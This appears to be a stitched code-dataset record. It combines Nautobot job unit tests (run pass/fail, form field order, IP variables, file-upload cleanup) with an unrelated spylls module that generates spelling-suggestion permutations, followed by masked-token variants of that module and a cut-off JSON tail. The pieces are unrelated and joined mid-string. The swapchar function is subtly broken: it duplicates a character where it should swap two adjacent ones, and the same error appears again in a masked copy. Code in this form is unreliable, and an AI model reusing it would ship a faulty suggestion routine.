\"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-5": "import json\nimport os\nimport uuid\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom nautobot.dcim.models import Site\nfrom nautobot.extras.choices import JobResultStatusChoices\nfrom nautobot.extras.jobs import get_job, run_job\nfrom nautobot.extras.models import FileAttachment, FileProxy, JobResult\nfrom nautobot.utilities.testing import TestCase\n\n\nclass JobTest(TestCase):\n \"\"\"\n Test basic jobs to ensure importing works.\n \"\"\"\n\n maxDiff = None\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label=\"extras\", model=\"job\")\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_pass\"\n name = \"TestPass\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n\n def test_job_fail(self):\n \"\"\"\n Job test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_fail\"\n name = \"TestFail\"\n job_class = get_job(f\"local/{module}/{name}\")\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_field_order\"\n name = \"TestFieldOrder\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n form = job_class().as_form()\n\n self.assertHTMLEqual(\n form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\",\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_no_field_order\"\n name = \"TestNoFieldOrder\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n form = job_class().as_form()\n\n self.assertHTMLEqual(\n form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\",\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_pass\"\n name = \"TestReadOnlyPass\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_fail\"\n name = \"TestReadOnlyFail\"\n job_class = get_job(f\"local/{module}/{name}\")\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted\n # Also ensure the standard log message about aborting the transaction is *not* present\n self.assertNotEqual(\n job_result.data[\"run\"][\"log\"][-1][-1], \"Database changes have been reverted due to error.\"\n )\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_no_commit_field\"\n name = \"TestReadOnlyNoCommitField\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n form = job_class().as_form()\n\n self.assertHTMLEqual(\n form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\",\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_ipaddress_vars\"\n name = \"TestIPAddresses\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n # Fill out the form\n form_data = dict(\n ipv4_address=\"1.2.3.4\",\n ipv4_with_mask=\"1.2.3.4/32\",\n ipv4_network=\"1.2.3.0/24\",\n ipv6_address=\"2001:db8::1\",\n ipv6_with_mask=\"2001:db8::1/64\",\n ipv6_network=\"2001:db8::/64\",\n )\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n\n # Prepare the job data\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n data = job_class.serialize_data(form.cleaned_data)\n\n # Run the job and extract the job payload data\n run_job(data=data, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data[\"run\"][\"log\"][0][2] # Indexing makes me sad.\n job_result_data = json.loads(job_payload)\n\n # Assert stuff\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b\"I am content.\\n\"\n cls.dummy_file = SimpleUploadedFile(name=\"dummy.txt\", content=cls.file_contents)\n cls.job_content_type = ContentType.objects.get(app_label=\"extras\", model=\"job\")\n\n def setUp(self):\n self.dummy_file.seek(0) # Reset cursor so we can read it again.\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n job_name = \"local/test_file_upload_pass/TestFileUploadPass\"\n job_class = get_job(job_name)\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n # Serialize the file to FileProxy\n data = {\"file\": self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n\n # Assert that the file was serialized to a FileProxy\n self.assertTrue(isinstance(serialized_data[\"file\"], uuid.UUID))\n self.assertEqual(serialized_data[\"file\"], FileProxy.objects.latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n\n # Run the job\n run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n\n # Assert that file contents were correctly read\n self.assertEqual(\n job_result.data[\"run\"][\"log\"][0][2], f\"File contents: {self.file_contents}\" # \"File contents: ...\"\n )\n\n # Assert that FileProxy was cleaned up\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n job_name = \"local/test_file_upload_fail/TestFileUploadFail\"\n job_class = get_job(job_name)\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n # Serialize the file to FileProxy\n data = {\"file\": self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n\n # Assert that the file was serialized to a FileProxy\n self.assertTrue(isinstance(serialized_data[\"file\"], uuid.UUID))\n self.assertEqual(serialized_data[\"file\"], FileProxy.objects.latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n\n # Run the job\n run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n\n # Assert that file contents were correctly read\n self.assertEqual(\n job_result.data[\"run\"][\"log\"][0][2], f\"File contents: {self.file_contents}\" # \"File contents: ...\"\n )\n # Also ensure the standard log message about aborting the transaction is present\n self.assertEqual(job_result.data[\"run\"][\"log\"][-1][-1], \"Database changes have been reverted due to error.\")\n\n # Assert that FileProxy was cleaned up\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-ids": [
10,
15,
16,
17,
20
]
}
|
[
10,
15,
16,
17,
20
] |
"""
Note: names of methods in this module, if seem weird, are the same as in Hunspell's ``suggest.cxx``
to keep track of them.
"""
from typing import Iterator, Union, List, Set
from spylls.hunspell.data import aff
MAX_CHAR_DISTANCE = 4
def replchars(word: str, reptable: List[aff.RepPattern]) -> Iterator[Union[str, List[str]]]:
"""
Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace
in the word provided. If the pattern's replacement contains "_", it means replacing to " " and
yielding _two_ different hypotheses: it was one (dictionary) word "foo bar" (and should be
checked as such) or it was words ["foo", "bar"] and should be checked separately.
"""
if len(word) < 2 or not reptable:
return
for pattern in reptable:
# TODO: compiled at aff loading
for match in pattern.regexp.finditer(word):
suggestion = word[:match.start()] + pattern.replacement.replace('_', ' ') + word[match.end():]
yield suggestion
if ' ' in suggestion:
yield suggestion.split(' ', 2)
def mapchars(word: str, maptable: List[Set[str]]) -> Iterator[str]:
"""
Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)
and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and we have
a misspelling "anarchia", ``mapchars`` will do this:
>>> [*pmt.mapchars("anarchia", ['aáã'])]
['ánarchia',
'ánárchia',
'ánárchiá',
'ánárchiã',
'ánãrchia',
'ánãrchiá',
'ánãrchiã',
'ãnarchia',
'ãnárchia',
'ãnárchiá',
'ãnárchiã',
'ãnãrchia',
'ãnãrchiá',
'ãnãrchiã']
"""
if len(word) < 2 or not maptable:
return
def mapchars_internal(word, start=0):
if start >= len(word):
return
for options in maptable:
for option in options:
pos = word.find(option, start)
if pos != -1:
for other in options:
if other == option:
continue
replaced = word[:pos] + other + word[pos+len(option):]
yield replaced
for variant in mapchars_internal(replaced, pos + 1):
yield variant
for variant in mapchars_internal(word):
yield variant
def swapchar(word: str) -> Iterator[str]:
"""
Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces
also doubleswaps: ahev -> have.
"""
if len(word) < 2:
return
for i in range(0, len(word) - 1):
yield word[:i] + word[i+1] + word[i+1] + word[i+2:]
# try double swaps for short words
# ahev -> have, owudl -> would
if len(word) in [4, 5]:
yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1] + word[-2]
if len(word) == 5:
yield word[0] + word[2] + word[1] + word[-1] + word[-2]
def longswapchar(word: str) -> Iterator[str]:
"""
Produces permutations with non-adjacent chars swapped (up to 4 chars distance)
"""
for first in range(0, len(word) - 2):
for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(word))):
yield word[:first] + word[second] + word[first+1:second] + word[first] + word[second+1:]
def badcharkey(word: str, layout: str) -> Iterator[str]:
"""
Produces permutations with chars replaced by adjacent chars on keyboard layout ("vat -> cat")
or downcased (if it was accidental uppercase).
Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`
"""
for i, c in enumerate(word):
before = word[:i]
after = word[i+1:]
if c != c.upper():
yield before + c.upper() + after
if not layout:
continue
pos = layout.find(c)
while pos != -1:
if pos > 0 and layout[pos-1] != '|':
yield before + layout[pos-1] + after
if pos + 1 < len(layout) and layout[pos+1] != '|':
yield before + layout[pos+1] + after
pos = layout.find(c, pos+1)
def extrachar(word: str) -> Iterator[str]:
"""
Produces permutations with one char removed in all possible positions
"""
if len(word) < 2:
return
for i in range(0, len(word)):
yield word[:i] + word[i+1:]
def forgotchar(word: str, trystring: str) -> Iterator[str]:
"""
Produces permutations with one char inserted in all possible possitions.
List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,
doesn't try anything! Chars there are expected to be sorted in order of chars usage in language
(most used characters first).
"""
if not trystring:
return
for c in trystring:
for i in range(0, len(word)):
yield word[:i] + c + word[i:]
def movechar(word: str) -> Iterator[str]:
"""
Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,
because it is already handled by :meth:`swapchar`)
"""
if len(word) < 2:
return
for frompos, char in enumerate(word):
for topos in range(frompos + 3, min(len(word), frompos + MAX_CHAR_DISTANCE + 1)):
yield word[:frompos] + word[frompos+1:topos] + char + word[topos:]
for frompos in reversed(range(0, len(word))):
for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1), frompos - 1)):
yield word[:topos] + word[frompos] + word[topos:frompos] + word[frompos+1:]
def badchar(word: str, trystring: str) -> Iterator[str]:
"""
Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`
set.
"""
if not trystring:
return
for c in trystring:
for i in reversed(range(0, len(word))):
if word[i] == c:
continue
yield word[:i] + c + word[i+1:]
def doubletwochars(word: str) -> Iterator[str]:
"""
Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)
"""
if len(word) < 5:
return
# TODO: 1) for vacacation yields "vacation" twice, hunspell's algo kinda wiser
# 2) maybe just use regexp?..
for i in range(2, len(word)):
if word[i-2] == word[i] and word[i-3] == word[i-1]:
yield word[:i-1] + word[i+1:]
def twowords(word: str) -> Iterator[List[str]]:
"""
Produces permutation of splitting in two words in all possible positions.
"""
for i in range(1, len(word)):
yield [word[:i], word[i:]]
|
normal
|
{
"blob_id": "cfba55505f3290a14b98d594bc871a74812c7c57",
"index": 5594,
"step-1": "<mask token>\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\n<mask token>\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\n<mask token>\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\n<mask token>\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-2": "<mask token>\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\n<mask token>\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\n<mask token>\n\n\ndef forgotchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n if len(word) < 2:\n return\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos +\n MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos + 1:topos] + char + word[topos:\n ]\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1),\n frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[\n frompos + 1:]\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\ndef doubletwochars(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n if len(word) < 5:\n return\n for i in range(2, len(word)):\n if word[i - 2] == word[i] and word[i - 3] == word[i - 1]:\n yield word[:i - 1] + word[i + 1:]\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-3": "<mask token>\nMAX_CHAR_DISTANCE = 4\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\ndef swapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces\n also doubleswaps: ahev -> have.\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word) - 1):\n yield word[:i] + word[i + 1] + word[i + 1] + word[i + 2:]\n if len(word) in [4, 5]:\n yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1\n ] + word[-2]\n if len(word) == 5:\n yield word[0] + word[2] + word[1] + word[-1] + word[-2]\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard 